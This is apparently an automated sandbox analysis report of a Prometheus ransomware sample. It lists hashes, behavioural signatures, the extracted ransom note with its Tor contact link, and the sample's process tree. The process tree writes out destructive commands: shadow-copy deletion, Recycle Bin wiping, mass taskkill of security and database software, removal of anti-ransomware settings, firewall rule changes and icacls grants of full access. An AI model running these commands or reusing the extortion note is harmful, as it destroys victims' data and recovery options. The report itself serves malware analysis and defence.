Analysis
-
max time kernel
44s -
max time network
9s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
28-05-2021 06:53
General
-
Target
20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe
-
Size
222KB
-
MD5
1493deb48d84805f19ba35e60d485e87
-
SHA1
a34a1aeda6019b041f112b1ddbbc290ef523042b
-
SHA256
20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5
-
SHA512
ce83d28d70a0d3f108431aa31858030a2cfb91d77f470fd7ef4aecbcd213541f4e393e2d59cdad1d2578dbd3411f43be9c1612e2a63dab8560bc64a16bb589ef
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Family
prometheus
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
--------------------------------------------------------------------------------
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
--------------------------------------------------------------------------------
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it's run.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
--------------------------------------------------------------------------------
!!!!!!!!!!!!!!!!!!!!!!!!
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
!!!!!!!!!!!!!!!!!!!!!!!!!
--------------------------------------------------------------------------------
It doesn't matter to us what you choose.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.
2. Press "Download Tor", then press "Download Tor Browser Bundle", install it.
3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser.
7. Start a chat and follow the further instructions.
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier:
HmernopoIzrKDiV/yij8C97R7rIu/wQHBgyKrkT8HS02Xp+s5Oyy9RnZFLI5uRj9QeUcORJIwYqbBgpNv9CFGUZbbhDVzrOxIY4qoUxNafdOyZ8g8BGO5rDB4nXZ9XZ4IsjE4R9R+UKAxditLslrHn8auuAFhRGQqPb2zL0C5Ys7j3LI0mwp9+EGijMNFvGoffCfjRKwWnz9sWx69BhCgeNhpsX2+TdCcgS9Pa1/Vxrm1ConAZzCODUQ2kzeMODNKXG2pZ+xopUZtfg85W82Pppm988ZVmiZKH158ReEg2zCvspCo2T/JfpmecwVxboPOtM/wD+2QbAdIObHygCeY5kdwf0eLRo7t8P6UMiDRDUEZ28GW/oJR/3obU567Mz8ufzpbUwlKhkXofdNCdwc1RzRiYEITYSAT6JbM3HJ8BBeqkYlTGujy+BnciSOLp1lG3g1kvA5iWTeYIZ3w+X8NQ1vBctWSVZs1b1GztUKd7LyUvRTA+EsPQV4wf5mtKlkCLoOI5J3QuSFh1s8MMYU6V7wlTIDjKx9KNGo0x/11eZQJymE7SCfitrAayDggAOKXz5iicYoY9PmJGw5si00zC5XBEfL/Ck/NBV//2qDTHr0XSNXBb419knuMcW3sqszSi5qZyizN/yL7UzqM1oZqDBFatgYKYsCu2YRLzhwf4o=
URLs
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe"C:\Users\Admin\AppData\Local\Temp\20d9efe472c01a0a23c9764db679b27a4b6a4d72e697e3508e44f218b8b952f5.bin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2031019117201861652751536468920909260261458029577152181831110824607991491210824"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4059233541773072486-175457095655755918-230877684-21389762091547445088407668658"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18170060234789824731790282483-18055769162055425976-650737829-10009230921335141997"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-103128349210366574347894028281824445993-1062508143-193181904220913664181450629041"1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txtFilesize
2KB
MD5c357c07d90d23bffd1e135c0d4ec4512
SHA1414cc6a8d0b7b48945f98bb6a976c0cc2afa5a15
SHA256ba91a5893bb83accaf6e70aaf6843fe5a0ec9db34c72c186acc7af917e11d76f
SHA5121eac4fa90755c4948cc1fbd3a1bc9afcac3d3f5ee5ab5a87d9529dc6ef3006b969969f62a5f6905356b02cbcf564a12150cca13daba7409a1005ee5e9e263d52
-
memory/108-79-0x0000000000000000-mapping.dmp
-
memory/240-72-0x0000000000000000-mapping.dmp
-
memory/280-106-0x0000000000000000-mapping.dmp
-
memory/292-83-0x0000000000000000-mapping.dmp
-
memory/316-63-0x0000000000000000-mapping.dmp
-
memory/432-81-0x0000000000000000-mapping.dmp
-
memory/432-120-0x0000000000000000-mapping.dmp
-
memory/484-100-0x0000000000000000-mapping.dmp
-
memory/516-130-0x0000000001F20000-0x0000000001F21000-memory.dmpFilesize
4KB
-
memory/516-66-0x0000000000000000-mapping.dmp
-
memory/516-136-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/516-133-0x000000001AB20000-0x000000001AB22000-memory.dmpFilesize
8KB
-
memory/516-128-0x0000000000000000-mapping.dmp
-
memory/516-135-0x000000001AB24000-0x000000001AB26000-memory.dmpFilesize
8KB
-
memory/516-131-0x000000001AD50000-0x000000001AD51000-memory.dmpFilesize
4KB
-
memory/516-134-0x0000000002340000-0x0000000002341000-memory.dmpFilesize
4KB
-
memory/524-99-0x0000000000000000-mapping.dmp
-
memory/536-76-0x0000000000000000-mapping.dmp
-
memory/560-67-0x0000000000000000-mapping.dmp
-
memory/564-75-0x0000000000000000-mapping.dmp
-
memory/564-102-0x0000000000000000-mapping.dmp
-
memory/568-86-0x0000000000000000-mapping.dmp
-
memory/576-78-0x0000000000000000-mapping.dmp
-
memory/604-70-0x0000000000000000-mapping.dmp
-
memory/604-119-0x0000000000000000-mapping.dmp
-
memory/632-107-0x0000000000000000-mapping.dmp
-
memory/640-127-0x0000000000000000-mapping.dmp
-
memory/660-96-0x0000000000000000-mapping.dmp
-
memory/672-89-0x0000000000000000-mapping.dmp
-
memory/672-101-0x0000000000000000-mapping.dmp
-
memory/692-93-0x0000000000000000-mapping.dmp
-
memory/752-98-0x0000000000000000-mapping.dmp
-
memory/760-104-0x0000000000000000-mapping.dmp
-
memory/764-84-0x0000000000000000-mapping.dmp
-
memory/788-122-0x0000000000000000-mapping.dmp
-
memory/792-123-0x0000000000000000-mapping.dmp
-
memory/992-110-0x0000000000000000-mapping.dmp
-
memory/1000-92-0x0000000000000000-mapping.dmp
-
memory/1000-109-0x0000000000000000-mapping.dmp
-
memory/1012-112-0x0000000000000000-mapping.dmp
-
memory/1012-65-0x0000000000000000-mapping.dmp
-
memory/1096-82-0x0000000000000000-mapping.dmp
-
memory/1100-62-0x000000001AD50000-0x000000001AD52000-memory.dmpFilesize
8KB
-
memory/1100-60-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/1108-121-0x0000000000000000-mapping.dmp
-
memory/1120-108-0x0000000000000000-mapping.dmp
-
memory/1120-91-0x0000000000000000-mapping.dmp
-
memory/1140-69-0x0000000000000000-mapping.dmp
-
memory/1156-94-0x0000000000000000-mapping.dmp
-
memory/1260-95-0x0000000000000000-mapping.dmp
-
memory/1292-118-0x0000000000000000-mapping.dmp
-
memory/1324-71-0x0000000000000000-mapping.dmp
-
memory/1468-125-0x0000000000000000-mapping.dmp
-
memory/1468-114-0x0000000000000000-mapping.dmp
-
memory/1468-90-0x0000000000000000-mapping.dmp
-
memory/1476-115-0x0000000000000000-mapping.dmp
-
memory/1480-64-0x0000000000000000-mapping.dmp
-
memory/1480-103-0x0000000000000000-mapping.dmp
-
memory/1488-77-0x0000000000000000-mapping.dmp
-
memory/1488-80-0x000007FEFC661000-0x000007FEFC663000-memory.dmpFilesize
8KB
-
memory/1576-88-0x0000000000000000-mapping.dmp
-
memory/1588-87-0x0000000000000000-mapping.dmp
-
memory/1596-124-0x0000000000000000-mapping.dmp
-
memory/1624-126-0x0000000000000000-mapping.dmp
-
memory/1624-117-0x0000000000000000-mapping.dmp
-
memory/1624-74-0x0000000000000000-mapping.dmp
-
memory/1660-111-0x0000000000000000-mapping.dmp
-
memory/1668-113-0x0000000000000000-mapping.dmp
-
memory/1672-105-0x0000000000000000-mapping.dmp
-
memory/1720-116-0x0000000000000000-mapping.dmp
-
memory/1896-68-0x0000000000000000-mapping.dmp
-
memory/1928-97-0x0000000000000000-mapping.dmp
-
memory/2012-73-0x0000000000000000-mapping.dmp